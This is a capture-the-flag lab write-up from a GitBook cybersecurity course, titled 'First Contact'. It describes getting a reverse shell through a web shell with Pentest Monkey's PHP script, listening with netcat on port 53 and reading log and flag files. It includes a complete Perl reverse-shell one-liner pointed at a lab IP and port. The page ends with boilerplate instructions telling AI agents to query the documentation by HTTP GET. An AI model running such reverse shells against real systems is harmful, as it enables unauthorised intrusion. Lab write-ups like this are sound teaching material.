# First Contact We have identified a potential attack surface that we can use to execute php and shell commands on. We are able to execute a reverse shell on the web shell in order to get a shell back on the machine. ### Uploading a php Reverseshell For the PHP reverse shell, we’ll be using Pentest Monkey’s reverse shell found [here](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php) or in kali under /usr/share/webshells/php/php-reverse-shell.php 1. Modify the reverse shell to your **tun0 IP address** and **port**. 2. Paste php code into webshell. Note: First line **\** needs to be removed 3. start netcat listener on port 53 4. Execute reverseshell
Problem with netcat listener on port 53
Kill systemd-resolv process and start netcat listener again Execute the reverseshell:
To answer the questions and find the flag I need to focus myself on logs Searching for logs: cd /var/log
content of /var/log
content of login.log and flag.txt
Getting the root flag
content of rot.txt
### Additional way to get a reverseshell {% embed url="" %} reverseshell cheatsheet {% endembed %} ``` perl -e 'use Socket;$i="10.50.133.33";$p=8001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' ``` ![Execute perl reverse shell](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2F72VZYSPluXcSD5e1ziik%2Fperl_reverseshell.png?alt=media\&token=b1357ec8-2687-4db4-b68f-0aa0b03ae539) ### Questions ![](https://3977837039-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MfT0VPyK6X13Egd9pzy%2Fuploads%2FVkLslY61LmTxpYc3nJ1C%2Fquestions_task10.png?alt=media\&token=6f09b468-8946-4cb7-9074-c03afbecf18b) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://cas-cyber.gitbook.io/cas-cybersecurity/windows-hacking/throwback-network/first-contact.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.